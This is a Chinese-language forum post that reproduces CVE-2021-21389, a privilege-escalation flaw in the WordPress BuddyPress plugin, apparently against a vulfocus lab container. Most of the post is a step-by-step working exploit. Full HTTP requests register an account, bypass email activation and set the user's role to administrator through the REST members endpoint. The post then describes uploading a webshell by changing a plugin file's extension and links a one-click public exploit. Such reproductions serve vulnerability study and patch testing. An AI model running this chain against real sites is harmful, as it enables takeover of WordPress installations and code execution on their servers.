IT评测·应用市场-qidao123.com技术社区

标题: WordPress BuddyPress 越权漏洞RCE（CVE-2021-21389） [打印本页]

作者: 守听 时间: 2024-9-30 20:29
标题: WordPress BuddyPress 越权漏洞RCE（CVE-2021-21389）

一、漏洞形貌

BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中，非特权平凡用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题。

二、影响版本

5.0.0 <BuddyPress< 7.2.1

三、漏洞复现

PS：本次复现利用的是vulfocus/wordpress_cve-2021-21389:latest

0x01、方法一

访问镜像地址：http://123.58.224.8:47613/

构造payload

POST //wp-json/buddypress/v1/signup HTTP/1.1
Host: ****:47613
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: python-requests/2.24.0
Accept: */*
Content-Type: application/json; charset=UTF-8
Content-Length: 109
{"user_login": "test1121", "user_email": "qxzkpzc@test.com", "user_name": "test1121", "password": "test1121"}

复制代码

将注册时的activation_key取出来，构造发包，以绕过邮箱验证
1. PUT //wp-json/buddypress/v1/signup/activate/ysQdW3ClM7UFXILKo6fY6HvsmvyPvKcn
复制代码
1. PUT //wp-json/buddypress/v1/signup/activate/ysQdW3ClM7UFXILKo6fY6HvsmvyPvKcn HTTP/1.1
2. Host: ****:42678
3. Cache-Control: max-age=0
4. Accept-Language: zh-CN
5. Upgrade-Insecure-Requests: 1
6. User-Agent: python-requests/2.24.0
7. Accept: */*
8. Content-Type: application/json; charset=UTF-8
9. Content-Length: 109
11. {"user_login": "test1121", "user_email": "qxzkpzc@test.com", "user_name": "test1121", "password": "test1121"}
复制代码
新建分组，填完Details后，然后settings默认点击下一步，然后重新进入groups，已经创建成功。
1. http://******/groups/create/step/group-details/
复制代码
点开test进入manage下面的members，点击Ban,然后抓包，获取到有效的Cookie和X-WP-Nonce，然后构造发包，更换掉内里的Cookie和X-WP-Nonce，然后获取administrator脚色的权限。
1. POST /wp-json/buddypress/v1/members/me
复制代码
抓包记录X-WP-Nonce:和Cookie:
更换以下X-WP-Nonce:和Cookie: 然后重放
1. POST /wp-json/buddypress/v1/members/me HTTP/1.1
2. Host: ****:12607
3. User-Agent: python-requests/2.21.0
4. Accept-Encoding: gzip, deflate
5. Accept: */*
6. Connection: close
7. X-WP-Nonce: e35e0de589
8. Content-Type: application/json; charset=UTF-8
9. Cookie: csrf_ab39a3=1ecdf739; csrf_8c4f79=b156b1be; csrf_957c5a=cface2f8; csrf_6b71bf=6c0e9317; csrf_8e5be2=89cebc1e; csrf_c5ff2a=dd558828; _ga=GA1.1.1188675309.1720941309; _ga_J1DQF09WZC=GS1.1.1720941333.1.0.1720941333.0.0.0; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_489344b85a8c7a5a56c84c4b6b5258dd=test1121%7C1721219647%7CRG5qc0NcljSkQwceqH1MdCki9vpKAEqaED5O5ses7g9%7C47378454df210bfc2305a11338a597a5a16ab80fe6effc26f5459f2c22d0f453; wp-settings-time-2=1721047705; wordpress_logged_in_765816418d916bdda113ab20c6c87ff6=test1121%7C1721221157%7CCH5do9vqj1ubaMm5iO2xgNa7hGYExgWkyNg1ie4Z6TU%7C5863b7b1265ffa32919477bb24d7f6626fda17483c11838fb603b5593e1a9cee
10. Content-Length: 26
12. {"roles": "administrator"}
复制代码
刷新页面已是管理员权限，已经获取到administrator脚色的权限可以查看和操作所有模块，我们通过更新plugins,上传shell
抓包修改文件后缀

访问wp-content/uploads/2024/07/（上传的年月）路径下获取已经上传的木马文件

0x02、方法二

利用大佬 HoangKien1020 写的exp 一键利用上传shell
GitHub - HoangKien1020/CVE-2021-21389: BuddyPress is an open source WordPress plugin to build a community site. In releases of BuddyPress from 5.0.0 before 7.2.1 it's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue.BuddyPress is an open source WordPress plugin to build a community site. In releases of BuddyPress from 5.0.0 before 7.2.1 it's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue. - HoangKien1020/CVE-2021-21389
https://github.com/HoangKien1020/CVE-2021-21389

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

欢迎光临 IT评测·应用市场-qidao123.com技术社区 (https://dis.qidao123.com/)